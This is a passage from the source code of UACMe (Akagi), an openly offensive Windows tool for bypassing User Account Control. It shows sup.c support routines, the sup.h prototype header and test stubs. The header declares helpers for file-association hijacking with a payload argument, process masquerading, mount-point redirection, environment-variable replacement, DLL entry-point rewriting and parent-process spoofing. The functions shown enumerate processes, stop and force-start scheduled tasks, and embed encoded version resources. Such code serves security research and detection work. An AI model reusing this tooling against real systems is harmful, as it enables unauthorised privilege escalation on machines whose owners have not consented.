                    RtlEqualUnicodeString(&lookupPsName, &List.Processes->ImageName, TRUE))
                {
                    hEnumProcess = NULL;
                    cid.UniqueProcess = List.Processes->UniqueProcessId;
                    cid.UniqueThread = NULL;

                    if (NT_SUCCESS(NtOpenProcess(&hEnumProcess,
                        PROCESS_QUERY_LIMITED_INFORMATION,
                        &obja,
                        &cid)))
                    {
                        if (NT_SUCCESS(NtQueryInformationProcess(hEnumProcess,
                            ProcessBasicInformation,
                            &pbi,
                            sizeof(pbi),
                            &dummy)))
                        {
                            // Only instances whose parent is this process count as children.
                            bRetry = (pbi.InheritedFromUniqueProcessId == dwCreatorPid);
                        }
                        NtClose(hEnumProcess);
                    }
                }
                if (bRetry)
                    break;
                nextEntryDelta = List.Processes->NextEntryDelta;
            } while (nextEntryDelta);
            supHeapFree(processList);
        }
        else
            break;

        if (bRetry) {
            Sleep(1000);
            dwCurrentWait += 1000;
        }
        else
            break;

    } while (dwCurrentWait <= dwMaxWait);

    return dwCurrentWait;
}
/*
* supRaiseHardError
*
* Purpose:
*
* Display UACMe hard error.
*
*/
VOID supRaiseHardError(
    _In_ NTSTATUS HardErrorStatus
)
{
    ULONG dwFlags;
    HMODULE hModule = NULL;
    WCHAR errorBuffer[1024];
    UNICODE_STRING usText;
    ULONG_PTR params[] = { (ULONG_PTR)&usText };
    HARDERROR_RESPONSE heResponse;

    // Win32 error codes are described by the system message table, NT status codes by ntdll.
    if (HRESULT_FACILITY(HardErrorStatus) == FACILITY_WIN32) {
        dwFlags = FORMAT_MESSAGE_IGNORE_INSERTS | FORMAT_MESSAGE_FROM_SYSTEM;
    }
    else {
        dwFlags = FORMAT_MESSAGE_IGNORE_INSERTS | FORMAT_MESSAGE_FROM_HMODULE;
        hModule = GetModuleHandle(RtlNtdllName);
    }

    errorBuffer[0] = 0;
    if (FormatMessage(dwFlags,
        hModule,
        HardErrorStatus,
        0,
        errorBuffer,
        RTL_NUMBER_OF(errorBuffer),
        NULL))
    {
        RtlInitUnicodeString(&usText, errorBuffer);
        NtRaiseHardError(STATUS_FATAL_APP_EXIT | HARDERROR_OVERRIDE_ERRORMODE,
            RTL_NUMBER_OF(params),
            1,
            (PULONG_PTR)params,
            OptionOk,
            (PULONG)&heResponse);
    }
}

/*
* supGetThreadTokenImpersonationLevel
*
* Purpose:
*
* Query thread token impersonation level.
*
*/
BOOL supGetThreadTokenImpersonationLevel(
    _In_ HANDLE ThreadHandle,
    _Out_ PSECURITY_IMPERSONATION_LEVEL ImpersonationLevel)
{
    ULONG dummy;
    HANDLE hToken = NULL;
    SECURITY_IMPERSONATION_LEVEL level = SecurityAnonymous;
    NTSTATUS ntStatus;

    ntStatus = NtOpenThreadToken(ThreadHandle, MAXIMUM_ALLOWED, TRUE, &hToken);
    if (NT_SUCCESS(ntStatus)) {
        ntStatus = NtQueryInformationToken(hToken,
            TokenImpersonationLevel,
            (PVOID)&level,
            sizeof(SECURITY_IMPERSONATION_LEVEL),
            &dummy);
        NtClose(hToken);
    }

    // On failure the output is the default SecurityAnonymous.
    *ImpersonationLevel = level;
    return NT_SUCCESS(ntStatus);
}

/*
* supGetTickCount64
*
* Purpose:
*
* GetTickCount64 equivalent, read directly from USER_SHARED_DATA.
*
*/
ULONGLONG supGetTickCount64(
    VOID
)
{
    ULARGE_INTEGER tickCount;

#ifdef _WIN64
    tickCount.QuadPart = USER_SHARED_DATA->TickCountQuad;
#else
    // 32-bit: the two halves cannot be read atomically, retry until High1Time and High2Time agree.
    while (TRUE) {
        tickCount.HighPart = (ULONG)USER_SHARED_DATA->TickCount.High1Time;
        tickCount.LowPart = USER_SHARED_DATA->TickCount.LowPart;
        if (tickCount.HighPart == (ULONG)USER_SHARED_DATA->TickCount.High2Time)
            break;
        NtYieldExecution();
    }
#endif

    return (UInt32x32To64(tickCount.LowPart, USER_SHARED_DATA->TickCountMultiplier) >> 24) +
        (UInt32x32To64(tickCount.HighPart, USER_SHARED_DATA->TickCountMultiplier) << 8);
}

/*
* supxExamineTaskhost
*
* Purpose:
*
* Find all tasks registered with the host process and stop them.
*
*/
BOOL supxExamineTaskhost(
    _In_ HANDLE UniqueProcessId
)
{
    HRESULT hr = E_FAIL;
    ULONG processId;
    LONG i, cTasks = 0;
    VARIANT varDummy, varIndex;
    ITaskService* pService = NULL;
    IRunningTaskCollection* pTasks = NULL;
    IRunningTask* pTask;
    TASK_STATE taskState = TASK_STATE_UNKNOWN;

    do {
        hr = CoCreateInstance(&CLSID_TaskScheduler,
            NULL,
            CLSCTX_INPROC_SERVER,
            &IID_ITaskService,
            (void**)&pService);
        HRESULT_BREAK_ON_FAILED(hr);

        VariantInit(&varDummy);
        hr = pService->lpVtbl->Connect(pService, varDummy, varDummy, varDummy, varDummy);
        HRESULT_BREAK_ON_FAILED(hr);

        hr = pService->lpVtbl->GetRunningTasks(pService, TASK_ENUM_HIDDEN, &pTasks);
        HRESULT_BREAK_ON_FAILED(hr);

        hr = pTasks->lpVtbl->get_Count(pTasks, &cTasks);
        HRESULT_BREAK_ON_FAILED(hr);

        // Task Scheduler collections are 1-based.
        varIndex.vt = VT_INT;
        for (i = 1; i <= cTasks; i++) {
            varIndex.lVal = i;
            hr = pTasks->lpVtbl->get_Item(pTasks, varIndex, &pTask);
            if (SUCCEEDED(hr)) {
                processId = 0;
                hr = pTask->lpVtbl->get_EnginePID(pTask, &processId);
                if (SUCCEEDED(hr) && processId == HandleToUlong(UniqueProcessId)) {
                    hr = pTask->lpVtbl->get_State(pTask, &taskState);
                    if (taskState == TASK_STATE_RUNNING) {
                        hr = pTask->lpVtbl->Stop(pTask);
                    }
                }
                pTask->lpVtbl->Release(pTask);
            }
        }

    } while (FALSE);

    if (pTasks)
        pTasks->lpVtbl->Release(pTasks);
    if (pService)
        pService->lpVtbl->Release(pService);

    return SUCCEEDED(hr);
}
/*
* supEnumTaskhostTasksCallback
*
* Purpose:
*
* Callback for taskhost task enumeration.
*
*/
BOOL CALLBACK supEnumTaskhostTasksCallback(
    _In_ PSYSTEM_PROCESS_INFORMATION ProcessEntry,
    _In_ PVOID UserContext
)
{
    PUNICODE_STRING targetProcess = (PUNICODE_STRING)UserContext;

    if (!RtlEqualUnicodeString(&ProcessEntry->ImageName, targetProcess, TRUE))
        return FALSE;

    supxExamineTaskhost(ProcessEntry->UniqueProcessId);

    // Never stop enumeration, every matching host instance is examined.
    return FALSE;
}

/*
* supStartScheduledTask
*
* Purpose:
*
* Run target task as schtasks does.
*
*/
BOOLEAN supStartScheduledTask(
    _In_ LPCWSTR lpTaskFolder,
    _In_ LPCWSTR lpTaskName
)
{
    HRESULT hr_init, hr = E_FAIL;
    ITaskService* pService = NULL;
    ITaskFolder* pRootFolder = NULL;
    IRegisteredTask* pTask = NULL;
    IRunningTask* pRunningTask = NULL;
    VARIANT var;
    BSTR bstrTaskFolder = NULL;
    BSTR bstrTask = NULL;

    hr_init = CoInitializeEx(NULL, COINIT_MULTITHREADED);

    do {
        bstrTaskFolder = SysAllocString(lpTaskFolder);
        if (bstrTaskFolder == NULL) {
            break;
        }

        bstrTask = SysAllocString(lpTaskName);
        if (bstrTask == NULL) {
            break;
        }

        hr = CoCreateInstance(&CLSID_TaskScheduler,
            NULL,
            CLSCTX_INPROC_SERVER,
            &IID_ITaskService,
            (void**)&pService);
        if (FAILED(hr)) {
            break;
        }

        // VT_NULL variants select the local machine and the current user.
        var.vt = VT_NULL;
        hr = pService->lpVtbl->Connect(pService, var, var, var, var);
        if (FAILED(hr)) {
            break;
        }

        hr = pService->lpVtbl->GetFolder(pService, bstrTaskFolder, &pRootFolder);
        if (FAILED(hr)) {
            break;
        }

        hr = pRootFolder->lpVtbl->GetTask(pRootFolder, bstrTask, &pTask);
        if (FAILED(hr)) {
            break;
        }

        hr = pTask->lpVtbl->RunEx(pTask, var, TASK_RUN_IGNORE_CONSTRAINTS, 0, NULL, &pRunningTask);
        if (FAILED(hr)) {
            break;
        }

    } while (FALSE);

    if (bstrTaskFolder)
        SysFreeString(bstrTaskFolder);
    if (bstrTask)
        SysFreeString(bstrTask);

    if (pRunningTask) {
        pRunningTask->lpVtbl->Stop(pRunningTask);
        pRunningTask->lpVtbl->Release(pRunningTask);
    }
    if (pTask)
        pTask->lpVtbl->Release(pTask);
    if (pRootFolder)
        pRootFolder->lpVtbl->Release(pRootFolder);
    if (pService)
        pService->lpVtbl->Release(pService);

    // Only balance CoInitializeEx when it actually succeeded for this thread.
    if (SUCCEEDED(hr_init))
        CoUninitialize();

    return SUCCEEDED(hr);
}

/*
* supReplaceVersionInfo
*
* Purpose:
*
* Add a new VERSION_INFO block to the file.
*
*/
BOOLEAN supReplaceVersionInfo(
    _In_ LPCWSTR lpFileName,
    _In_ PBYTE lpResource,
    _In_ DWORD dwResourceSize,
    _In_ DWORD dwKey
)
{
    BOOLEAN bResult = TRUE;
    HANDLE hUpdate;
    PVOID pvBuffer;
    SIZE_T bufferSize = ALIGN_UP_BY(dwResourceSize, PAGE_SIZE);

    do {
        pvBuffer = supVirtualAlloc(&bufferSize,
            DEFAULT_ALLOCATION_TYPE | MEM_TOP_DOWN,
            DEFAULT_PROTECT_TYPE,
            NULL);

        if (pvBuffer == NULL) {
            bResult = FALSE;
            break;
        }

        RtlCopyMemory(pvBuffer, lpResource, dwResourceSize);
        EncodeBuffer(pvBuffer, dwResourceSize, dwKey);

        hUpdate = BeginUpdateResource(lpFileName, FALSE);
        if (hUpdate == NULL) {
            bResult = FALSE;
            break;
        }

        if (!UpdateResource(hUpdate,
            RT_VERSION,
            MAKEINTRESOURCEW(1),
            MAKELANGID(LANG_ENGLISH, SUBLANG_ENGLISH_US),
            pvBuffer,
            dwResourceSize))
        {
            // Discard the pending update and report the failure.
            EndUpdateResource(hUpdate, TRUE);
            bResult = FALSE;
            break;
        }

        // Committing the update can fail too (e.g. file locked), so take its result.
        bResult = (EndUpdateResource(hUpdate, FALSE) != FALSE);

    } while (FALSE);

    if (pvBuffer)
        supSecureVirtualFree(pvBuffer, bufferSize, NULL);

    return bResult;
}

================================================
FILE: Source/Akagi/sup.h
================================================
/*******************************************************************************
*
*  (C) COPYRIGHT AUTHORS, 2014 - 2025
*
*  TITLE:       SUP.H
*
*  VERSION:     3.68
*
*  DATE:        07 Mar 2025
*
*  Common header file for the program support routines.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#pragma once

typedef int(__cdecl* pswprintf_s)(
    wchar_t* buffer,
    size_t sizeOfBuffer,
    const wchar_t* format,
    ...);

#define TEXT_SECTION            ".text"
#define TEXT_SECTION_LEGNTH     sizeof(TEXT_SECTION)

//
// Shell association start.
//
typedef enum {
    UASET_CLEAR = 0,
    UASET_APPLICATION,
    UASET_PROGID,
} UASET;

typedef HRESULT(WINAPI* pfnUserAssocSet)(
    UASET set,
    LPCWSTR pszExt,
    LPCWSTR pszSet);

typedef HRESULT(WINAPI* pfnUserAssocSet2)(
    UASET set,
    LPCWSTR pszExt,
    LPCWSTR pszSet,
    ULONG dwFlags);

typedef struct _USER_ASSOC_PTR {
    union {
        pfnUserAssocSet UserAssocSet;
        pfnUserAssocSet2 UserAssocSet2; //Win10 1904 1909
    } DUMMYUNIONNAME;
    BOOL Valid;
} USER_ASSOC_PTR, * PUSER_ASSOC_PTR;

typedef struct USER_ASSOC_PATTERN {
    PVOID Ptr;
    DWORD Size;
} USER_ASSOC_PATTERN, * PUSER_ASSOC_PATTERN;

typedef struct USER_ASSOC_SIGNATURE {
    ULONG NtBuildMin;
    ULONG NtBuildMax;
    ULONG PatternsCount;
    PVOID PatternsTable;
} USER_ASSOC_SIGNATURE, * PUSER_ASSOC_SIGNATURE;

typedef VOID(WINAPI* PSUP_UAS_ENUMERATION_CALLBACK_FUNCTION)(
    _In_ PUSER_ASSOC_SIGNATURE Signature,
    _In_opt_ PVOID Context,
    _Inout_ BOOLEAN* StopEnumeration
    );

//
// Shell association end.
//

typedef struct _SXS_SEARCH_CONTEXT {
    LPWSTR DllName;
    LPWSTR SxsKey;
    LPWSTR FullDllPath;
} SXS_SEARCH_CONTEXT, *PSXS_SEARCH_CONTEXT;

//ntifs.h
typedef struct _REPARSE_DATA_BUFFER {
    ULONG ReparseTag;
    USHORT ReparseDataLength;
    USHORT Reserved;
    union {
        struct {
            USHORT SubstituteNameOffset;
            USHORT SubstituteNameLength;
            USHORT PrintNameOffset;
            USHORT PrintNameLength;
            ULONG Flags;
            WCHAR PathBuffer[1];
        } SymbolicLinkReparseBuffer;
        struct {
            USHORT SubstituteNameOffset;
            USHORT SubstituteNameLength;
            USHORT PrintNameOffset;
            USHORT PrintNameLength;
            WCHAR PathBuffer[1];
        } MountPointReparseBuffer;
        struct {
            UCHAR DataBuffer[1];
        } GenericReparseBuffer;
    } DUMMYUNIONNAME;
} REPARSE_DATA_BUFFER, *PREPARSE_DATA_BUFFER;

#define REPARSE_DATA_BUFFER_HEADER_LENGTH FIELD_OFFSET(REPARSE_DATA_BUFFER, GenericReparseBuffer.DataBuffer)

//
// Memory allocator flags.
//
#define DEFAULT_ALLOCATION_TYPE (MEM_COMMIT | MEM_RESERVE)
#define DEFAULT_PROTECT_TYPE    PAGE_READWRITE

//
// sup* prototypes
//
VOID supSetLastErrorFromNtStatus(
    _In_ NTSTATUS LastNtStatus);

BOOLEAN supIsProcess32bit(
    _In_ HANDLE hProcess);

BOOL supGetElevationType(
    _Out_ TOKEN_ELEVATION_TYPE *lpType);

BOOL supWriteBufferToFile(
    _In_ LPCWSTR lpFileName,
    _In_opt_ PVOID Buffer,
    _In_ DWORD BufferSize);

BOOL supDecodeAndWriteBufferToFile(
    _In_ LPWSTR lpFileName,
    _In_ CONST PVOID Buffer,
    _In_ DWORD BufferSize,
    _In_ ULONG Key);

PBYTE supReadFileToBuffer(
    _In_ LPCWSTR lpFileName,
    _Inout_opt_ LPDWORD lpBufferSize);

HANDLE supRunProcess3(
    _In_ LPCWSTR lpFile,
    _In_opt_ LPCWSTR lpParameters,
    _In_opt_ LPCWSTR lpVerb,
    _In_ INT nShow);

BOOL supRunProcess2(
    _In_ LPCWSTR lpFile,
    _In_opt_ LPCWSTR lpParameters,
    _In_opt_ LPCWSTR lpVerb,
    _In_ INT nShow,
    _In_ ULONG mTimeOut);

BOOL supRunProcess(
    _In_ LPCWSTR lpFile,
    _In_opt_ LPCWSTR lpParameters);

void supCopyMemory(
    _Inout_ void *dest,
    _In_ size_t cbdest,
    _In_ const void *src,
    _In_ size_t cbsrc);

LPWSTR supQueryEnvironmentVariableOffset(
    _In_ PUNICODE_STRING Value);

DWORD supCalculateCheckSumForMappedFile(
    _In_ PVOID BaseAddress,
    _In_ ULONG FileLength);

BOOLEAN supVerifyMappedImageMatchesChecksum(
    _In_ PVOID BaseAddress,
    _In_ ULONG FileLength);

BOOLEAN supSetCheckSumForMappedFile(
    _In_ PVOID BaseAddress,
    _In_ ULONG CheckSum);

NTSTATUS supLdrQueryResourceDataEx(
    _In_ ULONG_PTR ResourceId,
    _In_ PVOID DllHandle,
    _Out_ PULONG DataSize,
    _Out_ PVOID* Data);

PBYTE supLdrQueryResourceData(
    _In_ ULONG_PTR ResourceId,
    _In_ PVOID DllHandle,
    _Out_ PULONG DataSize);

VOID supMasqueradeProcess(
    _In_ BOOL Restore);

DWORD supExpandEnvironmentStrings(
    _In_ LPCWSTR lpSrc,
    _In_ LPWSTR lpDst,
    _In_ DWORD nSize);

BOOL sxsFindLoaderEntry(
    _In_ PSXS_SEARCH_CONTEXT Context);

VOID supDebugPrint(
    _In_ LPCWSTR ApiName,
    _In_ DWORD status);

PVOID supVirtualAlloc(
    _Inout_ PSIZE_T Size,
    _In_ ULONG AllocationType,
    _In_ ULONG Protect,
    _Out_opt_ NTSTATUS *Status);

BOOL
supVirtualFree(
    _In_ PVOID Memory,
    _Out_opt_ NTSTATUS *Status);

BOOL supSecureVirtualFree(
    _In_ PVOID Memory,
    _In_ SIZE_T MemorySize,
    _Out_opt_ NTSTATUS *Status);

PVOID FORCEINLINE supHeapAlloc(
    _In_ SIZE_T Size);

BOOL FORCEINLINE supHeapFree(
    _In_ PVOID Memory);

BOOL supRegDeleteKeyRecursive(
    _In_ HKEY hKeyRoot,
    _In_ LPCWSTR lpSubKey);

BOOL supSetEnvVariableEx(
    _In_ BOOL fRemove,
    _In_opt_ LPWSTR lpKeyName,
    _In_ LPCWSTR lpVariableName,
    _In_opt_ LPCWSTR lpVariableData);

BOOL supSetEnvVariable(
    _In_ BOOL fRemove,
    _In_opt_ LPWSTR lpKeyName,
    _In_ LPCWSTR lpVariableName,
    _In_opt_ LPCWSTR lpVariableData);

BOOL supSetEnvVariable2(
    _In_ BOOL fRemove,
    _In_opt_ LPWSTR lpKeyName,
    _In_ LPCWSTR lpVariableName,
    _In_opt_ LPCWSTR lpVariableData);

_Success_(return)
BOOL supReplaceEnvironmentVariableValue(
    _In_opt_ LPWSTR lpKeyName,
    _In_ LPWSTR lpVariableName,
    _In_ DWORD dwType,
    _In_opt_ LPWSTR lpVariableData,
    _Out_opt_ PVOID* lpOldVariableData);

BOOL supSetMountPoint(
    _In_ HANDLE hDirectory,
    _In_ LPCWSTR lpTarget,
    _In_ LPCWSTR lpPrintName);

BOOL supDeleteMountPoint(
    _In_ HANDLE hDirectory);

HANDLE supOpenDirectoryForReparse(
    _In_ LPCWSTR lpDirectory);

BOOL supWinstationToName(
    _In_opt_ HWINSTA hWinsta,
    _In_ LPWSTR lpBuffer,
    _In_ DWORD cbBuffer,
    _Out_ PDWORD BytesNeeded);

BOOL supDesktopToName(
    _In_opt_ HDESK hDesktop,
    _In_ LPWSTR lpBuffer,
    _In_ DWORD cbBuffer,
    _Out_ PDWORD BytesNeeded);

BOOL supReplaceDllEntryPoint(
    _In_ PVOID DllImage,
    _In_ ULONG SizeOfDllImage,
    _In_ LPCSTR lpEntryPointName,
    _In_ BOOL fConvertToExe);

NTSTATUS supRegWriteValue(
    _In_ HANDLE hKey,
    _In_opt_ LPWSTR ValueName,
    _In_ DWORD ValueType,
    _In_ PVOID ValueData,
    _In_ ULONG ValueDataSize);

NTSTATUS supRegReadValue(
    _In_ HANDLE hKey,
    _In_ LPWSTR ValueName,
    _In_ DWORD ValueType,
    _Out_ PVOID *Buffer,
    _Out_ ULONG *BufferSize,
    _In_opt_ HANDLE hHeap);

NTSTATUS supRegCurrentUserDeleteSubKeyValue(
    _In_ LPWSTR SubKey,
    _In_ LPWSTR ValueName);

BOOL supQuerySystemRoot(
    _Inout_ PVOID Context);

PVOID supGetSystemInfo(
    _In_
    SYSTEM_INFORMATION_CLASS SystemInformationClass);

BOOL supIsCorImageFile(
    _In_ PVOID ImageBase);

PVOID supEncodePointer(
    _In_ PVOID Pointer);

PVOID supDecodePointer(
    _In_ PVOID Pointer);

NTSTATUS supCreateDirectory(
    _Out_opt_ PHANDLE phDirectory,
    _In_ OBJECT_ATTRIBUTES *ObjectAttributes,
    _In_ ULONG DirectoryShareFlags,
    _In_ ULONG DirectoryAttributes);

BOOL supCreateSharedParametersBlock(
    _In_ PVOID ucmContext);

VOID supDestroySharedParametersBlock(
    _In_ PVOID ucmContext);

PVOID supCreateUacmeContext(
    _In_ ULONG Method,
    _In_reads_or_z_opt_(OptionalParameterLength) LPWSTR OptionalParameter,
    _In_ ULONG OptionalParameterLength,
    _In_ PVOID DecompressRoutine);

VOID supDestroyUacmeContext(
    _In_ PVOID Context);

NTSTATUS supEnableDisableWow64Redirection(
    _In_ BOOL bDisable);

NTSTATUS supGetProcessDebugObject(
    _In_ HANDLE ProcessHandle,
    _Out_ PHANDLE DebugObjectHandle);

BOOL supIsProcessRunning(
    _In_ LPWSTR ProcessName);

void supBinTextEncode(
    _In_ unsigned __int64 x,
    _Inout_ wchar_t* s);

VOID supGenerateSharedObjectName(
    _In_ WORD ObjectId,
    _Inout_ LPWSTR lpBuffer);

VOID supSetGlobalCompletionEvent(
    VOID);

NTSTATUS supWaitForGlobalCompletionEvent(
    VOID);

NTSTATUS supOpenClassesKey(
    _In_opt_ PUNICODE_STRING UserRegEntry,
    _Out_ PHANDLE KeyHandle);

NTSTATUS supRemoveRegLinkHKCU(
    _In_ LPWSTR lpszRegLink);

PVOID supFindPattern(
    _In_ CONST PBYTE Buffer,
    _In_ SIZE_T BufferSize,
    _In_ CONST PBYTE Pattern,
    _In_ SIZE_T PatternSize);

PVOID supLookupImageSectionByName(
    _In_ CHAR* SectionName,
    _In_ ULONG SectionNameLength,
    _In_ PVOID DllBase,
    _Out_ PULONG SectionSize);

NTSTATUS supFindUserAssocSet(
    _Out_ USER_ASSOC_PTR* Function);

PUSER_ASSOC_SIGNATURE supGetUserAssocSetDB(
    _Out_opt_ PULONG SignatureCount);

VOID supEnumUserAssocSetDB(
    _In_ PSUP_UAS_ENUMERATION_CALLBACK_FUNCTION Callback,
    _In_opt_ PVOID Context);

NTSTATUS supRegisterShellAssoc(
    _In_ LPCWSTR pszExt,
    _In_ LPCWSTR pszProgId,
    _In_ USER_ASSOC_PTR* UserAssocFunc,
    _In_ LPCWSTR lpszPayload,
    _In_ BOOL fCustomURIScheme,
    _In_opt_
    LPCWSTR pszDefaultValue);

NTSTATUS supUnregisterShellAssocEx(
    _In_ BOOLEAN fResetOnly,
    _In_ LPCWSTR pszExt,
    _In_opt_ LPCWSTR pszProgId,
    _In_ USER_ASSOC_PTR* UserAssocFunc);

NTSTATUS supUnregisterShellAssoc(
    _In_ LPCWSTR pszExt,
    _In_ LPCWSTR pszProgId,
    _In_ USER_ASSOC_PTR* UserAssocFunc);

NTSTATUS supResetShellAssoc(
    _In_ LPCWSTR pszExt,
    _In_opt_ LPCWSTR pszProgId,
    _In_ USER_ASSOC_PTR* UserAssocFunc);

BOOL supStopTaskByName(
    _In_ LPCWSTR TaskFolder,
    _In_ LPCWSTR TaskName);

LPWSTR supPathAddBackSlash(
    _In_ LPWSTR lpszPath);

HANDLE supOpenShellProcess(
    _In_ ULONG dwDesiredAccess);

HANDLE supRunProcessFromParent(
    _In_ HANDLE hParentProcess,
    _Inout_opt_ LPWSTR lpApplicationName,
    _In_ LPWSTR lpszParameters,
    _In_opt_ LPWSTR lpCurrentDirectory,
    _In_ ULONG CreationFlags,
    _In_ WORD ShowWindowFlags,
    _Out_opt_ HANDLE* PrimaryThread);

RPC_STATUS supCreateBindingHandle(
    _In_ RPC_WSTR RpcInterfaceUuid,
    _Out_ RPC_BINDING_HANDLE* BindingHandle);

BOOL supConcatenatePaths(
    _Inout_ LPWSTR Target,
    _In_ LPCWSTR Path,
    _In_ SIZE_T TargetBufferSize);

typedef BOOL(CALLBACK* pfnEnumProcessCallback)(
    _In_ PSYSTEM_PROCESS_INFORMATION ProcessEntry,
    _In_opt_ PVOID UserContext
    );

BOOL supEnumProcessesForSession(
    _In_ ULONG SessionId,
    _In_ pfnEnumProcessCallback Callback,
    _In_opt_ PVOID UserContext);

BOOL supRemoveDirectoryRecursive(
    _In_ LPCWSTR Path);

VOID supEnableToastForProtocol(
    _In_ LPCWSTR lpProtocol,
    _In_ BOOL fEnable);

ULONG supWaitForChildProcesses(
    _In_ LPCWSTR lpProcessName,
    _In_ DWORD dwWaitMiliseconds);

VOID supRaiseHardError(
    _In_ NTSTATUS HardErrorStatus);

BOOL supGetThreadTokenImpersonationLevel(
    _In_ HANDLE ThreadHandle,
    _Out_ PSECURITY_IMPERSONATION_LEVEL ImpersonationLevel);

ULONGLONG supGetTickCount64(
    VOID);

BOOL CALLBACK supEnumTaskhostTasksCallback(
    _In_ PSYSTEM_PROCESS_INFORMATION ProcessEntry,
    _In_ PVOID UserContext);

BOOLEAN supStartScheduledTask(
    _In_ LPCWSTR lpTaskFolder,
    _In_ LPCWSTR lpTaskName);

BOOLEAN supReplaceVersionInfo(
    _In_ LPCWSTR lpFileName,
    _In_ PBYTE
    lpResource,
    _In_ DWORD dwResourceSize,
    _In_ DWORD dwKey);

#ifdef _DEBUG
#define supDbgMsg(Message) OutputDebugString(Message)
#else
#define supDbgMsg(Message)
#endif

#define PathFileExists(lpszPath) (GetFileAttributes(lpszPath) != (DWORD)-1)

================================================
FILE: Source/Akagi/tests/test.c
================================================
/*******************************************************************************
*
*  (C) COPYRIGHT AUTHORS, 2017 - 2022
*
*  TITLE:       TEST.C
*
*  VERSION:     3.61
*
*  DATE:        22 Jun 2022
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#include "global.h"

VOID WINAPI TestEnumDB(
    _In_ PUSER_ASSOC_SIGNATURE Signature,
    _In_opt_ PVOID Context,
    _Inout_ BOOLEAN* StopEnumeration
)
{
    WCHAR szBuffer[MAX_PATH + 1];

    UNREFERENCED_PARAMETER(Context);

    // Dump one signature record to the debugger output.
    _strcpy(szBuffer, TEXT("\r\nSign->NtBuildMin: "));
    ultostr(Signature->NtBuildMin, _strend(szBuffer));
    _strcat(szBuffer, TEXT("\r\n"));
    _strcat(szBuffer, TEXT("Sign->NtBuildMax: "));
    ultostr(Signature->NtBuildMax, _strend(szBuffer));
    _strcat(szBuffer, TEXT("\r\n"));
    _strcat(szBuffer, TEXT("Sign->PatternsCount: "));
    ultostr(Signature->PatternsCount, _strend(szBuffer));
    _strcat(szBuffer, TEXT("\r\n"));
    _strcat(szBuffer, TEXT("Sign->PatternsTable: 0x"));
    u64tohex((ULONG_PTR)Signature->PatternsTable, _strend(szBuffer));
    _strcat(szBuffer, TEXT("\r\n------------------"));

    OutputDebugString(szBuffer);

    *StopEnumeration = FALSE;
}

VOID TestEnumUAS(VOID)
{
    supEnumUserAssocSetDB((PSUP_UAS_ENUMERATION_CALLBACK_FUNCTION)TestEnumDB, NULL);
}

/*
* ucmTestRoutine
*
* Purpose:
*
* Test routine, can serve multiple purposes.
*
*/
BOOL ucmTestRoutine(
    _In_opt_ PVOID PayloadCode,
    _In_ ULONG PayloadSize)
{
    UNREFERENCED_PARAMETER(PayloadCode);
    UNREFERENCED_PARAMETER(PayloadSize);

    //TestEnumUAS();

    supSetGlobalCompletionEvent();
    return TRUE;
}

================================================
FILE: Source/Akagi/tests/test.h
================================================
/*******************************************************************************
*
*  (C) COPYRIGHT AUTHORS, 2017 - 2022
*
*  TITLE:       TEST.H
*
*  VERSION:     3.61
*
*  DATE:        22 Jun 2022
*
*  Test unit header file.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#pragma once

typedef interface ITestInterface ITestInterface;

typedef HRESULT(STDMETHODCALLTYPE *MethodPfn)(
    __RPC__in ITestInterface * This);

typedef struct ITestInterfaceVtbl {

    BEGIN_INTERFACE

    HRESULT(STDMETHODCALLTYPE *QueryInterface)(
        __RPC__in ITestInterface * This,
        __RPC__in REFIID riid,
        _COM_Outptr_ void **ppvObject);

    ULONG(STDMETHODCALLTYPE *AddRef)(
        __RPC__in ITestInterface * This);

    ULONG(STDMETHODCALLTYPE *Release)(
        __RPC__in ITestInterface * This);

    MethodPfn a[200];

    /*
    HRESULT(STDMETHODCALLTYPE *Method1)(__RPC__in ITestInterface * This);
    HRESULT(STDMETHODCALLTYPE *Method2)(__RPC__in ITestInterface * This);
    HRESULT(STDMETHODCALLTYPE *Method3)(__RPC__in ITestInterface * This);
    HRESULT(STDMETHODCALLTYPE *Method4)(__RPC__in ITestInterface * This);
    HRESULT(STDMETHODCALLTYPE *Method5)(__RPC__in ITestInterface * This);
    HRESULT(STDMETHODCALLTYPE *Method6)(__RPC__in ITestInterface * This);
    HRESULT(STDMETHODCALLTYPE *Method7)(__RPC__in ITestInterface * This);
    HRESULT(STDMETHODCALLTYPE *Method8)(__RPC__in ITestInterface * This);
    HRESULT(STDMETHODCALLTYPE *Method9)(__RPC__in ITestInterface * This);
    HRESULT(STDMETHODCALLTYPE *Method10)(__RPC__in ITestInterface * This);
    HRESULT(STDMETHODCALLTYPE *Method11)(__RPC__in ITestInterface * This);
    HRESULT(STDMETHODCALLTYPE *Method12)(__RPC__in ITestInterface * This);
    HRESULT(STDMETHODCALLTYPE *Method13)(__RPC__in ITestInterface * This);
    HRESULT(STDMETHODCALLTYPE *Method14)(__RPC__in ITestInterface * This);
    HRESULT(STDMETHODCALLTYPE *Method15)(__RPC__in ITestInterface * This);
    HRESULT(STDMETHODCALLTYPE *Method16)(__RPC__in ITestInterface * This);
    */

    END_INTERFACE

} *PITestInterfaceVtbl;

interface ITestInterface {
    CONST_VTBL struct ITestInterfaceVtbl *lpVtbl;
};

BOOL ucmTestRoutine(
    _In_opt_ PVOID PayloadCode,
    _In_ ULONG PayloadSize);

================================================
FILE: Source/Akagi/uacme.vcxproj
================================================
================================================
FILE: Source/Akagi/uacme.vcxproj.filters
================================================
================================================
FILE: Source/Akagi/uacme.vcxproj.user
================================================

================================================
FILE: Source/Akagi/uas.h
================================================
/*******************************************************************************
*
*  (C) COPYRIGHT AUTHORS, 2021 - 2024
*
*  TITLE:       UAS.H
*
*  VERSION:     3.66
*
*  DATE:        22 Jul 2024
*
*  UserAssocSet signature file.
*
